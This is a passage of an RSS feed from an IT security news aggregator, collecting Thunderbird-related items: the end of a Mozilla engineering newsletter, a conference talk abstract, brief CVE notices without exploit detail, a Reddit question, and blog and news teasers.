<p>Olivier Mehani finalized support for using the new Lando instance for try-pushes. This brings a host of QoL improvements which weren’t backported to the old instance: better UTF-8 support, smarter conflict resolution and improved security and authentication. It is <a href="https://sql.telemetry.mozilla.org/dashboard/new-lando-try-dashboard?p_date_range=d_last_7_days&amp;p_repo_name=try">now processing about 1500 pushes / week</a> (old Lando still processes about 50 / week).</p>
</li>
<li>
<p>Magnolia Liu implemented automatic pushes to Try for uplift requests, for faster feedback in case of issues.</p>
</li>
<li>
<p>Olivier Mehani added a view of a user’s current and recent jobs on <a href="https://lando.moz.tools/" rel="noopener nofollow ugc">the landing page of Lando</a> when authenticated.</p>
</li>
<li>
<p>Zeid identified and fixed the causes of some stability and reliability issues in Lando, which were causing increased downtime during deployments and on an ongoing basis.</p>
</li>
<li>
<p>Olivier Mehani deployed a PoC of reviewer selection on the GitHub pilot, allowing Herald-like mechanisms to GitHub PRs.</p>
</li>
<li>
<p>Olivier Mehani and Connor Sheehan (with Corey Bryant and Daniel Darnell) migrated the COMM project to GitHub <a href="http://github.com/thunderbird/thunderbird-desktop" rel="noopener nofollow ugc">https://github.com/thunderbird/thunderbird-desktop</a>, sharing Firefox’s syncing model.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-release-management-and-engineering-image29x29uploadgyvgvdmglodpm14lqcrvtdappfzpng-11" name="p-295620-release-management-and-engineering-image29x29uploadgyvgvdmglodpm14lqcrvtdappfzpng-11"></a>Release Management and Engineering <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/7/6/76f9deb903b684961e54fa3afbdabcc30db09731.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="29" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/optimized/3X/7/6/76f9deb903b684961e54fa3afbdabcc30db09731_2_29x29.png" width="29"></a></div></h4>
<ul>
<li>
<p>Donal Meehan drove the Release Management team’s move to a weekly scheduled dot release cadence for Desktop and Android, starting with Firefox 151. This allows us to deliver fixes and approved uplifts to users faster and more predictably. This change is expected to reduce unplanned releases, improve release flexibility, and create a more consistent release rhythm across teams.</p>
</li>
<li>
<p>Dianna Smith drove the update to the Release Management team’s <a href="https://docs.google.com/document/d/1oktCbzZ3M7NZTMBxv8yEOYmNHHxaIstZ55vRMI9PmzM/edit?tab=t.0#heading=h.r7335u1pggl8" rel="noopener nofollow ugc">Desktop major release rollout process</a>, starting with Firefox 152. Instead of throttling to 0% on day 2, it will remain at 25% rollout for two days before moving to 100%, unless any issues arise. This should help us collect uptake and stability signals earlier while still allowing time to catch problems before full rollout.</p>
</li>
<li>
<p>Pascal Chevrel completed the update to the dictionaries shipped with Firefox Desktop. The update added eleven new dictionaries, covering Croatian, English (UK), Georgian, Persian, Slovenian, Tajik, Tamil, Tibetan, Turkish, Welsh, and Xhosa, and refreshed nine others. This expanded the number of locales with a built-in spellchecker from 30 to 41 beginning in Firefox 152. Special thanks to Francesco Lodolo, Bryan Olsson, and the localization community for reviewing the patches and helping assess the quality of the dictionaries.</p>
</li>
<li>
<p>Pascal Chevrel delivered a range of improvements to <a href="https://whattrainisitnow.com/" rel="noopener nofollow ugc">WhatTrainIsItNow</a>, including expanded it to cover weekly dot releases and ESR planned dot releases, added new uplift views including a <a href="https://whattrainisitnow.com/release/uplifts/" rel="noopener nofollow ugc">dot-release uplifts page</a> and a <a href="https://whattrainisitnow.com/beta/uplifts/graph/" rel="noopener nofollow ugc">beta uplift graph</a>, and published <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2045812">new APIs</a> that surface train-selection and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2044143">uplift guidance inside Lando</a>. He also made performance improvements and a steady stream of fixes across the site.</p>
</li>
<li>
<p>At Pwn2Own 2026, Firefox came through with no successful exploits, thanks to preparation across many teams and individuals. Within Release Management, Ryan VanderMeulen drove pre-event patch readiness and Dianna Smith coordinated the releases during the event, including the 150.0.3 dot release, which mitigated the root cause behind several of the contest entries.</p>
</li>
<li>
<p>Dianna Smith built out release-health monitoring and alerting in Bigeye, giving Release Management a growing set of automated alerts that surface data anomalies earlier to aid in release health and regression detection. To make the capability easy to extend, she also <a href="https://docs.google.com/document/d/11WAYaMt2RQOAZLjYti3VZY6Bcws1fjF5q8hBlYUKgHo/edit?tab=t.0" rel="noopener nofollow ugc">created a guide for other teams</a> to add monitoring and alerts for the areas they know best. Teams that want an earlier signal on their own metrics are encouraged to use the guide and help grow the coverage.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-release-operations-12" name="p-295620-release-operations-12"></a>Release Operations <img alt=":wrench:" class="emoji" height="20" src="https://emoji.discourse-cdn.com/twitter/wrench.png?v=15" title=":wrench:" width="20"></h4>
<ul>
<li>
<p>Ryan Curran built <a href="https://github.com/mozilla-platform-ops/hangar" rel="noopener nofollow ugc">Hangar</a>, a live dashboard for monitoring Firefox CI’s worker pools. It consolidates fleet data from several systems into one view, giving Release Operations a single place to check fleet health and catch problems such as missing or quarantined workers early.</p>
</li>
<li>
<p>Ryan Curran created the <a href="https://github.com/mozilla-platform-ops/BuildWatch" rel="noopener nofollow ugc">iOS version of BuildWatch</a>, and Andrew Erickson ported it to <a href="https://github.com/mozilla-platform-ops/BuildWatch-Android" rel="noopener nofollow ugc">Android</a>. BuildWatch lets you monitor Firefox CI try pushes from your phone, including live per-platform build status, failure summaries, and one-tap retriggers. It uses only public APIs, so no VPN is required.</p>
</li>
<li>
<p>Andrew Erickson and Mark Cornmesser developed <a href="https://github.com/mozilla-platform-ops/fleetbench" rel="noopener nofollow ugc">Fleetbench</a>, a tool for benchmarking Firefox CI workers. It currently measures CPU and ADB/USB I/O performance, helping Release Operations identify slow or outlier hosts before they skew performance test results such as Speedometer and trigger noisy or false regressions.</p>
</li>
<li>
<p>Andrew Erickson built <a href="https://pool-classifier.relops.mozilla.com/" rel="noopener nofollow ugc">Pool Classifier</a>, a web app for viewing per-worker success rates across Taskcluster worker pools. It classifies newly completed tasks every 15 minutes, giving Release Operations a continuously updated view of worker health and helping surface problematic workers proactively.</p>
</li>
<li>
<p>Andrew Erickson created <a href="https://github.com/mozilla-platform-ops/fleetroll_mvp" rel="noopener nofollow ugc">Fleetroll</a>, a command-line tool Release Operations uses to manage and monitor long-running Linux, macOS, and Windows hardware hosts in Firefox CI Taskcluster. It deploys Puppet branch overrides and Vault secrets, audits what is actually applied, and surfaces each host’s Puppet and Taskcluster state in a live dashboard.</p>
</li>
<li>
<p>Mark Cornmesser built out a set of new worker-metrics dashboards in Yardstick, giving Release Operations clearer real-time visibility into the health of the Firefox CI hardware fleet. These include <a href="https://yardstick.mozilla.org/d/linux-all-status-v1/linux-all-status?orgId=1&amp;from=now-6h&amp;to=now&amp;timezone=browser&amp;var-pool=%24__all&amp;var-hostname=%24__all">Linux worker</a> status, <a href="https://yardstick.mozilla.org/d/windows-all-metrics-v1/windows-all-metrics?orgId=1&amp;from=now-6h&amp;to=now&amp;timezone=browser&amp;var-pool=%24__all&amp;var-hostname=%24__all">Windows worker CPU and disk</a> metrics, and a <a href="https://yardstick.mozilla.org/d/windows-pickup-wait-timeline-v1/066c1e0?orgId=1&amp;from=now-24h&amp;to=now&amp;timezone=browser&amp;var-pool=%24__all">Windows job pickup and wait</a> timeline, with alerting on key thresholds. The full set lives in the <a href="https://yardstick.mozilla.org/dashboards/f/cffmfl1sfr1moe/fxci-hardware-workers">FXCI Hardware Workers folder</a> in Yardstick.</p>
</li>
<li>
<p>Jonathan Moss expanded cloud cost reporting in Looker, adding <a href="https://mozilla.cloud.looker.com/dashboards/2861?Submission%20Date=30%20day&amp;Cloud%20Provider=" rel="noopener nofollow ugc">Azure support</a> alongside the existing GCP data and a cloud-provider filter on the FXCI task overview dashboard. The team can now break down Firefox CI compute costs by cloud provider, making it easier to track and compare spend across Azure and GCP.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-taskcluster-image20x25uploado7keh2uqbjtt24xnmh0gz4v0lympng-13" name="p-295620-taskcluster-image20x25uploado7keh2uqbjtt24xnmh0gz4v0lympng-13"></a>Taskcluster <img alt="image" height="25" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/a/9/a9086272fd26499516b5a852c89ed3f55df11142.png" width="20"></h4>
<ul>
<li>
<p>Yaraslau Kurmyza added Azure fast deprovision <a href="https://github.com/taskcluster/taskcluster/pull/8790" rel="noopener nofollow ugc">taskcluster#8790</a>  and concurrency <a href="https://github.com/taskcluster/taskcluster/issues/8815" rel="noopener nofollow ugc">taskcluster#8815</a> to improve worker scanner performance. This shows ~2x-4x scan time improvements already.</p>
</li>
<li>
<p>Contributor <a href="https://github.com/nitishagar" rel="noopener nofollow ugc">nitishagar</a>  and Yaraslau Kurmyza added patches <a href="https://github.com/taskcluster/taskcluster/pull/8514" rel="noopener nofollow ugc">taskcluster#8514</a>,  <a href="https://github.com/taskcluster/taskcluster/pull/8784" rel="noopener nofollow ugc">taskcluster#8784</a>  to support compression in Taskcluster services API and Yarik worked with Fastly to resolve broken brotli support on the WAF edge side. Now services transmit significantly less data.</p>
</li>
<li>
<p>Yarik added a dedicated service account to log with read only permissions <a href="https://github.com/mozilla/webservices-infra/pull/11197" rel="noopener nofollow ugc">webservices-infra#11197</a>. This allows <a href="https://github.com/taskcluster/tc-logview/pull/4" rel="noopener nofollow ugc">tc-logview</a> to be used safely by untrusted agents inside containers with narrow short-lived access tokens.</p>
</li>
<li>
<p>Yarik published <a href="http://35.202.240.190/" rel="noopener nofollow ugc">queue forecasting dashboard</a> experiments that continuously collects task events and trains models to enable and improve predictions on a task level (how long will it run, and when will it start). With future plans including extending it to the whole task group (mach try)</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-treeherder-image32x32upload9mg2vslsdl1se97nhycpirqkvuvpng-14" name="p-295620-treeherder-image32x32upload9mg2vslsdl1se97nhycpirqkvuvpng-14"></a>Treeherder <img alt="image" height="32" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/4/4/449439d59f33f7cc62df6501dd75c5f88d6f5fe5.png" width="32"></h4>
<ul>
<li>
<p>Florian Quèze added <a href="https://github.com/mozilla/treeherder/pull/9540" rel="noopener nofollow ugc">treeherder#9540</a> “Show task group profile” item to the push action menu</p>
</li>
<li>
<p>Cameron Dawson, juungo and moijes12 implemented various Treeherder API performance improvements</p>
</li>
<li>
<p>Heitor Neiva added Git branch labels to pushes in Treeherder</p>
</li>
<li>
<p>Andrew Halberstadt <a href="https://github.com/mozilla/treeherder/pull/9496" rel="noopener nofollow ugc">implemented</a> the ability for Treeherder to display multiple Git branches at once, enabling support for “try like” repositories in Github</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-version-control-image35x35uploadfgrydspdrdwuflvmedhcxxzrhwtpng-15" name="p-295620-version-control-image35x35uploadfgrydspdrdwuflvmedhcxxzrhwtpng-15"></a>Version Control <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/6/d/6ded138b62af5c8222b8f5fab637590ba2920993.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="35" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/6/d/6ded138b62af5c8222b8f5fab637590ba2920993.png" width="35"></a></div></h4>
<ul>
<li>
<p>Upgrade <a href="http://hg.mozilla.org/">hg.mozilla.org</a> to Mercurial 7.2.2</p>
</li>
<li>
<p>Created the <a href="https://hg-edge.mozilla.org/releases/mozilla-esr153">mozilla-esr153</a> and <a href="https://hg-edge.mozilla.org/releases/comm-esr153">comm-esr153</a> repositories.</p>
</li>
</ul>
<h4><a class="anchor" href="https://discourse.mozilla.org/#p-295620-other-image30x30upload1b45rv2lz4qu5bjwdcrkbeihtshpng-16" name="p-295620-other-image30x30upload1b45rv2lz4qu5bjwdcrkbeihtshpng-16"></a>Other <div class="lightbox-wrapper"><a class="lightbox" href="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/0/8/08426801fd78ca4953d83a1589119ec724b9c801.png" rel="noopener nofollow ugc" title="image"><img alt="image" height="30" src="https://us1.discourse-cdn.com/flex001/uploads/mozilla/original/3X/0/8/08426801fd78ca4953d83a1589119ec724b9c801.png" width="30"></a></div></h4>
<ul>
<li>Sylvestre converted our documentation from reStructuredText to MyST flavored Markdown</li>
</ul>
<p>Thanks for reading and see you next quarter!</p>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://discourse.mozilla.org/t/engineering-effectiveness-newsletter-q2-2026-edition/148883">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[openSUSE & grommunio - The Exchange alternative (osc26)]]></title>
<description><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft E...]]></description>
<link>https://tsecurity.de/de/3656863/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656863/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</guid>
<pubDate>Thu, 09 Jul 2026 13:33:18 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft Exchange, with a strong focus on the technology behind making it usable out of the box. The session will show how grommunio builds on the openSUSE ecosystem to deliver a complete collaboration appliance based on openSUSE 16.0, using KIWI to create a reproducible, maintainable, and deployable system image.

Rather than only discussing groupware features, this talk goes behind the scenes: how the appliance is assembled, how openSUSE provides the operating system foundation, and how grommunio packages email, calendaring, contacts, mobile synchronization, Evolution/Thunderbird/Outlook compatibility, and administration into an integrated enterprise experience.

A key focus is the out-of-the-box experience: turning a powerful open source software stack into a product that can be installed, configured, and operated by real organizations. The talk highlights how openSUSE technologies enable a reliable appliance model, how grommunio delivers enterprise collaboration on top of it, and why this matters for organizations that want to reduce vendor lock-in without compromising usability or professional requirements.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3033 | Mozilla Thunderbird up to 91.13.0 HTML Email information disclosure (Bug 1784838 / EUVD-2022-42466)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Mozilla Thunderbird up to 91.13.0. Affected by this vulnerability is an unknown functionality of the component HTML Email Handler. This manipulation causes information disclosure.

This vulnerability appears as CVE-2022-3033. The attack ...]]></description>
<link>https://tsecurity.de/de/3656005/sicherheitsluecken/cve-2022-3033-mozilla-thunderbird-up-to-91130-html-email-information-disclosure-bug-1784838-euvd-2022-42466/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656005/sicherheitsluecken/cve-2022-3033-mozilla-thunderbird-up-to-91130-html-email-information-disclosure-bug-1784838-euvd-2022-42466/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.13.0</a>. Affected by this vulnerability is an unknown functionality of the component <em>HTML Email Handler</em>. This manipulation causes information disclosure.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2022-3033">CVE-2022-3033</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3034 | Mozilla Thunderbird up to 91.13.0 HTML Email information disclosure (Bug 1745751 / EUVD-2022-42467)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Mozilla Thunderbird up to 91.13.0. This affects an unknown part of the component HTML Email Handler. Performing a manipulation results in information disclosure.

This vulnerability is known as CVE-2022-3034. Remote exploitat...]]></description>
<link>https://tsecurity.de/de/3656003/sicherheitsluecken/cve-2022-3034-mozilla-thunderbird-up-to-91130-html-email-information-disclosure-bug-1745751-euvd-2022-42467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656003/sicherheitsluecken/cve-2022-3034-mozilla-thunderbird-up-to-91130-html-email-information-disclosure-bug-1745751-euvd-2022-42467/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.13.0</a>. This affects an unknown part of the component <em>HTML Email Handler</em>. Performing a manipulation results in information disclosure.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-3034">CVE-2022-3034</a>. Remote exploitation of the attack is possible. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thoughts on Thunderbird Early Bird?]]></title>
<description><![CDATA[So thunderbird is releasing their own email service https://tb.pro Do you have an idea about the value they offer? I know there are options out there like protonmail, tuta or fastmail, but I am always interested in alternatives.    submitted by    /u/wodes   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655742/linux-tipps/thoughts-on-thunderbird-early-bird/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655742/linux-tipps/thoughts-on-thunderbird-early-bird/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So thunderbird is releasing their own email service <a href="https://tb.pro/">https://tb.pro</a><br> Do you have an idea about the value they offer? I know there are options out there like protonmail, tuta or fastmail, but I am always interested in alternatives.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/wodes"> /u/wodes </a> <br> <span><a href="https://i.redd.it/562kt9raz1ch1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ur21x5/thoughts_on_thunderbird_early_bird/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[openSUSE & grommunio - The Exchange alternative (osc26)]]></title>
<description><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft E...]]></description>
<link>https://tsecurity.de/de/3654810/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654810/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</guid>
<pubDate>Wed, 08 Jul 2026 17:36:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft Exchange, with a strong focus on the technology behind making it usable out of the box. The session will show how grommunio builds on the openSUSE ecosystem to deliver a complete collaboration appliance based on openSUSE 16.0, using KIWI to create a reproducible, maintainable, and deployable system image.

Rather than only discussing groupware features, this talk goes behind the scenes: how the appliance is assembled, how openSUSE provides the operating system foundation, and how grommunio packages email, calendaring, contacts, mobile synchronization, Evolution/Thunderbird/Outlook compatibility, and administration into an integrated enterprise experience.

A key focus is the out-of-the-box experience: turning a powerful open source software stack into a product that can be installed, configured, and operated by real organizations. The talk highlights how openSUSE technologies enable a reliable appliance model, how grommunio delivers enterprise collaboration on top of it, and why this matters for organizations that want to reduce vendor lock-in without compromising usability or professional requirements.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Desktop settings research: what we learned from your feedback]]></title>
<description><![CDATA[A few weeks ago, we conducted hour-long conversations with 10 of our users to dig deep into how you manage your preferences and configurations in Thunderbird desktop. While this specific research cycle focused on the desktop experience, our ultimate goal is a holistic strategy that ensures our mo...]]></description>
<link>https://tsecurity.de/de/3652560/tools/desktop-settings-research-what-we-learned-from-your-feedback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652560/tools/desktop-settings-research-what-we-learned-from-your-feedback/</guid>
<pubDate>Tue, 07 Jul 2026 20:57:39 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A few weeks ago, we conducted hour-long conversations with 10 of our users to dig deep into how you manage your preferences and configurations in Thunderbird desktop. While this specific research cycle focused on the desktop experience, our ultimate goal is a holistic strategy that ensures our mobile settings feel like a natural extension of […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/07/desktopsettings/">Desktop settings research: what we learned from your feedback</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Desktop settings user research findings]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 3x - Views:16 A quick overview of the insights gathered from interviewing 10 users about how they manage preferences and configurations in Thunderbird desktop. Aly shares the key challenges based on user feedback and design opportunities to guide our next ...]]></description>
<link>https://tsecurity.de/de/3652210/video/desktop-settings-user-research-findings/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652210/video/desktop-settings-user-research-findings/</guid>
<pubDate>Tue, 07 Jul 2026 18:39:46 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 3x - Views:16 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/wFF7Yt-m82o?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>A quick overview of the insights gathered from interviewing 10 users about how they manage preferences and configurations in Thunderbird desktop. Aly shares the key challenges based on user feedback and design opportunities to guide our next phase of work.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird für Android: Update auf Version 20.1 behebt Absturzursachen]]></title>
<description><![CDATA[Kurzer Hinweis für alle, die Thunderbird auf ihrem Android-Smartphone oder-Tablet nutzen: Die Entwickler haben die Version 20.1 des mobilen E-Mail-Clients veröffentlicht. Bei dem Release handelt es sich um ein reines Wartungs-Update, das sich gezielt um unschöne Abstürze kümmert. Unter der...Zum ...]]></description>
<link>https://tsecurity.de/de/3651146/it-nachrichten/thunderbird-fuer-android-update-auf-version-201-behebt-absturzursachen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651146/it-nachrichten/thunderbird-fuer-android-update-auf-version-201-behebt-absturzursachen/</guid>
<pubDate>Tue, 07 Jul 2026 12:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzer Hinweis für alle, die Thunderbird auf ihrem Android-Smartphone oder-Tablet nutzen: Die Entwickler haben die Version 20.1 des mobilen E-Mail-Clients veröffentlicht. Bei dem Release handelt es sich um ein reines Wartungs-Update, das sich gezielt um unschöne Abstürze kümmert. Unter der...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-fuer-android-update-auf-version-20-1-behebt-absturzursachen/">Thunderbird für Android: Update auf Version 20.1 behebt Absturzursachen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird: MZLA bündelt Abomodelle unter neuem Namen und mehr]]></title>
<description><![CDATA[Das Entwicklerteam hinter Mozilla Thunderbird hat einige Änderungen an seinen kommenden Abomodellen angekündigt. Wie der Kollege Sören Hentzschel in seinem Blog berichtet, werden die diversen Zusatzdienste künftig unter dem Namen Thundermail gebündelt, womit der Name des Maildienstes nun für alle...]]></description>
<link>https://tsecurity.de/de/3647834/it-nachrichten/thunderbird-mzla-buendelt-abomodelle-unter-neuem-namen-und-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647834/it-nachrichten/thunderbird-mzla-buendelt-abomodelle-unter-neuem-namen-und-mehr/</guid>
<pubDate>Mon, 06 Jul 2026 07:32:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2023/05/thunderbird_logo_neu_titelbild.png" class="attachment-single-thumb size-single-thumb wp-post-image" alt="Thunderbird Logo neu Titelbild" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2023/05/thunderbird_logo_neu_titelbild.png 720w, https://www.drwindows.de/news/wp-content/uploads/2023/05/thunderbird_logo_neu_titelbild-300x150.png 300w, https://www.drwindows.de/news/wp-content/uploads/2023/05/thunderbird_logo_neu_titelbild-643x322.png 643w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Das Entwicklerteam hinter Mozilla Thunderbird hat einige Änderungen an seinen kommenden Abomodellen angekündigt. Wie der Kollege Sören Hentzschel in seinem Blog berichtet, werden die diversen Zusatzdienste künftig unter dem Namen Thundermail gebündelt, womit der Name des Maildienstes nun für alle Services gelten wird. Due Umbenennung von Thunderbird Pro geht auf direktes Nutzerfeedback zurück und soll […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/thunderbird-mzla-buendelt-abomodelle-unter-neuem-namen-und-mehr">Thunderbird: MZLA bündelt Abomodelle unter neuem Namen und mehr</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3647309/it-security-nachrichten/mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647309/it-security-nachrichten/mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Sun, 05 Jul 2026 23:22:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-07-04 - Kernels, Firefox, Thunderbird, KDE Gear, COSMIC, QEmu]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may f...]]></description>
<link>https://tsecurity.de/de/3644989/unix-server/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644989/unix-server/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/</guid>
<pubDate>Sat, 04 Jul 2026 09:46:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-864416-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-864416-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-864416-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-864416-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
